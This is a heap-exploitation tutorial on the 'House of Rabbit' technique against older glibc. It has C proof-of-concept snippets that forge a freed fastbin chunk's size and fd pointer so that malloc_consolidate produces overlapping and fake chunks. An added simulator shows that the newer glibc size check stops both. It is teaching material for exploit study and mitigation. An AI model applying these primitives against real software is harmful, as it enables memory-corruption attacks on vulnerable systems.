Triggering malloc_consolidate: this can be done either by requesting a large chunk (a request outside the small-bin range while fastbin chunks exist) or by freeing a chunk that merges with the top chunk and reaches the consolidation threshold; either way the allocator is forced to consolidate the fastbins.

Objective: Create an overlapping chunk by manipulating the size of a fastbin chunk.
```c
unsigned long* chunk1 = malloc(0x40); // 0x40-byte request: chunk of size 0x50 at 0x602000
unsigned long* chunk2 = malloc(0x40); // Another 0x50 chunk, directly after it at 0x602050
malloc(0x10); // Padding chunk at 0x6020a0 so the chunk after chunk2 is an in-use chunk, not the top chunk
```
We allocate two chunks from 0x40-byte requests (chunk size 0x50; the addresses are chunk headers, the returned pointers are 0x10 past them). Both land in the 0x50 fastbin once freed.
```c
free(chunk1); // Frees the chunk at 0x602000 into the 0x50 fastbin
free(chunk2); // Frees the chunk at 0x602050 on top of it
```
We free both chunks; they are now linked in the 0x50 fastbin, chunk2 first.
```c
chunk1[-1] = 0xa1; // Overwrite chunk1's size field (the word just before the returned pointer)
```
We change the size field of chunk1 to 0xa1: a size of 0xa0 (0x50 + 0x50, exactly chunk1 plus chunk2, ending at the padding chunk) with PREV_INUSE set. This is the crucial step that tricks the allocator during consolidation, since malloc_consolidate trusts the size field of each fastbin chunk it walks.
Trigger malloc_consolidate:
```c
malloc(0x1000); // A large request with non-empty fastbins triggers malloc_consolidate
```
Allocating a large chunk triggers malloc_consolidate, which walks the fastbins and moves every chunk into the unsorted bin using its (now forged) size. chunk1 is filed as a 0xa0-byte free chunk, so it covers chunk2 as well.

After consolidation, chunk1 overlaps with chunk2: a later allocation served from the enlarged chunk1 hands out memory that includes chunk2, allowing further exploitation.
Objective: Create a fake chunk by manipulating the fastbin fd pointer.
```c
unsigned long* chunk1 = malloc(0x40);  // 0x50 chunk at 0x602000
unsigned long* chunk2 = malloc(0x100); // 0x110 chunk at 0x602050; its data starts at 0x602060
```
Explanation: We allocate two chunks, one fastbin-sized and one larger whose data area will hold the fake chunks.
```c
chunk2[1] = 0x31;  // Fake chunk: header at chunk2's data (0x602060), size 0x30 | PREV_INUSE
chunk2[7] = 0x21;  // Size field of the chunk that follows the fake chunk (0x602060 + 0x30)
chunk2[11] = 0x21; // Size field of the chunk after that, read to decide whether the previous one is in use
```
We write fake chunk metadata into chunk2's data to simulate a small chunk followed by two in-use neighbours. malloc_consolidate reads the next chunk's size and, from the chunk after it, the PREV_INUSE bit, so all three size fields must look sane or it will try to merge or crash.
```c
free(chunk1); // Frees the chunk at 0x602000 into the 0x50 fastbin
```
Explanation: We free chunk1, adding it to the fastbin list; it is now the head of the 0x50 bin and its fd pointer sits at chunk1[0].
```c
chunk1[0] = 0x602060; // Overwrite chunk1's fd with the fake chunk's address (chunk2's data pointer)
```
Explanation: We change the forward pointer (fd) of chunk1, which occupies the first word of its data area, to point to our fake chunk inside chunk2. Fastbin fd pointers hold chunk (header) addresses, and the fake header was placed at 0x602060, the start of chunk2's data.
Trigger malloc_consolidate:
```c
malloc(5000); // Another large request triggers malloc_consolidate
```
Allocating a large chunk again triggers malloc_consolidate, which follows chunk1's fd to the fake chunk and processes it like any other fastbin chunk.

The fake chunk is moved into the unsorted bin as a 0x30-byte free chunk, making it a legitimate chunk that a later allocation can return, which yields a pointer into chunk2's data for further exploitation.
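Both steps above, as an added example that is not part of the original page: a C model of the fastbin free path and of malloc_consolidate's walk over a byte-array heap, so the two layouts can be checked offline on any glibc (the real technique needs a glibc old enough to lack the size check and tcache). The byte-array heap, the functions consolidate, free_fast, step1_overlap and step2_fake_chunk, and the strict flag are this model's own; strict stands in for the fastbin_index check that current glibc performs and is not glibc code.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model heap (byte array, no bounds checks) addressed as 0x602000 + offset to match the
   walkthrough. 64-bit chunk layout: prev_size at +0, size at +8, data and fastbin fd at +0x10. */
#define HEAP_BASE  0x602000ULL
#define SIZE_BITS  0x7ULL
#define PREV_INUSE 0x1ULL

static uint8_t  heap[0x200];
static uint64_t fastbins[10];   /* head of each singly linked fastbin */
static uint64_t top;            /* address of the model top chunk */

static uint64_t rd(uint64_t a) { uint64_t v; memcpy(&v, heap + (a - HEAP_BASE), 8); return v; }
static void     wr(uint64_t a, uint64_t v) { memcpy(heap + (a - HEAP_BASE), &v, 8); }
static uint64_t chunksize(uint64_t p) { return rd(p + 8) & ~SIZE_BITS; }
static void     set_size(uint64_t p, uint64_t field) { wr(p + 8, field); }
static unsigned fastbin_index(uint64_t sz) { return (unsigned)((sz >> 4) - 2); }  /* glibc, 64-bit */
static void     reset(void) { memset(heap, 0, sizeof heap); memset(fastbins, 0, sizeof fastbins); }

/* Fastbin path of _int_free: the bin is chosen by the chunk's own size field. */
static void free_fast(uint64_t p) {
    unsigned idx = fastbin_index(chunksize(p));
    wr(p + 0x10, fastbins[idx]);      /* fd = previous head */
    fastbins[idx] = p;
}

struct range { uint64_t start, end; };

/* Model of malloc_consolidate: each fastbin chunk is taken at whatever its size field says and
   handed to the unsorted bin (collected in out[]). Backward merging is omitted because every
   size field in these layouts has PREV_INUSE set. strict=true adds the check newer glibc
   performs (the size must map back to bin i); returns -1 where glibc would abort. */
static int consolidate(bool strict, struct range *out, int max_out) {
    int n = 0;
    for (unsigned i = 0; i < 10; i++) {
        uint64_t p = fastbins[i];
        fastbins[i] = 0;
        while (p) {
            uint64_t nextp = rd(p + 0x10);            /* fd, read before p is rewritten */
            uint64_t size  = chunksize(p);
            if (strict && fastbin_index(size) != i)
                return -1;                            /* "malloc_consolidate(): invalid chunk size" */
            uint64_t nextchunk = p + size, nextsize = chunksize(nextchunk);
            if (nextchunk == top) {                   /* bordering top: merged into top instead */
                set_size(p, (size + nextsize) | PREV_INUSE); top = p; p = nextp; continue;
            }
            /* inuse_bit_at_offset(nextchunk, nextsize) reads the PREV_INUSE bit of the chunk
               AFTER nextchunk: this is why the fake chunk in step 2 needs two followers */
            bool nextinuse = rd(nextchunk + nextsize + 8) & PREV_INUSE;
            if (!nextinuse) size += nextsize;         /* forward merge with a free neighbour */
            else wr(nextchunk + 8, rd(nextchunk + 8) & ~PREV_INUSE);  /* clear_inuse_bit */
            set_size(p, size | PREV_INUSE);
            wr(p + size, size);                       /* set_foot */
            if (n < max_out) out[n++] = (struct range){ p, p + size };
            p = nextp;
        }
    }
    return n;
}

/* Step 1 of the page: two freed 0x50 chunks, chunk1's size field rewritten to 0xa1.
   Returns 1 if the two unsorted chunks overlap, 0 if not, -1 if consolidate rejected the size. */
static int step1_overlap(bool strict) {
    reset();
    uint64_t chunk1 = 0x602000, chunk2 = 0x602050, pad = 0x6020a0;
    set_size(chunk1, 0x51); set_size(chunk2, 0x51); set_size(pad, 0x21);  /* pad = malloc(0x10) */
    top = 0x6020c0; set_size(top, 0x141);
    free_fast(chunk1); free_fast(chunk2);
    set_size(chunk1, 0xa1);            /* chunk1[-1] = 0xa1: 0x50 + 0x50, ends exactly at pad */
    struct range r[4];
    int n = consolidate(strict, r, 4);
    return n < 0 ? -1 : (n == 2 && r[0].start < r[1].end && r[1].start < r[0].end);
}

/* Step 2 of the page: chunk1's fd pointed at a fake 0x30 chunk built inside chunk2's data.
   Returns the address consolidate accepted for the fake chunk, or 0 if it was rejected. */
static uint64_t step2_fake_chunk(bool strict) {
    reset();
    uint64_t chunk1 = 0x602000, chunk2 = 0x602050;   /* chunk2 = malloc(0x100): size 0x110 */
    set_size(chunk1, 0x51); set_size(chunk2, 0x111);
    top = 0x602160; set_size(top, 0xa1);
    uint64_t user2 = chunk2 + 0x10;                  /* the pointer malloc(0x100) returned */
    wr(user2 + 8 * 1, 0x31);   /* chunk2[1]:  fake chunk header at user2, size 0x30 */
    wr(user2 + 8 * 7, 0x21);   /* chunk2[7]:  size of the chunk after the fake one */
    wr(user2 + 8 * 11, 0x21);  /* chunk2[11]: size of the one after that, for the inuse test */
    free_fast(chunk1);
    wr(chunk1 + 0x10, user2);  /* chunk1[0] = 0x602060: fd -> fake chunk */
    struct range r[4];
    int n = consolidate(strict, r, 4);
    return (n == 2 && r[1].end - r[1].start == 0x30) ? r[1].start : 0;
}

int main(void) {
    printf("step 1: overlap=%d (old glibc), %d (with size check)\n", step1_overlap(false), step1_overlap(true));
    printf("step 2: fake chunk at %#llx (old glibc), %#llx (with size check)\n",
           (unsigned long long)step2_fake_chunk(false), (unsigned long long)step2_fake_chunk(true));
    return 0;
}
```

With the check off, step 1 yields two unsorted chunks [0x602000, 0x6020a0) and [0x602050, 0x6020a0) that overlap, and step 2 files the fake chunk at 0x602060 as a 0x30-byte free chunk; with it on, both runs stop at the forged size, which is the mitigation that retires this technique on current glibc.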
The House of Rabbit technique either modifies the size of a fastbin chunk to create overlapping chunks or manipulates its fd pointer to inject fake chunks, relying on malloc_consolidate trusting the size field of every fastbin chunk it walks. This lets an attacker forge chunks that the allocator treats as legitimate, which is the basis for further exploitation. Note that newer glibc versions abort in malloc_consolidate when a chunk's size does not map back to the fastbin it came from ("malloc_consolidate(): invalid chunk size"), and with tcache (glibc 2.26 and later) the matching tcache bin must be filled before a freed chunk reaches the fastbins at all, so the steps as written target older glibc. Understanding and practicing these steps will enhance your heap exploitation skills.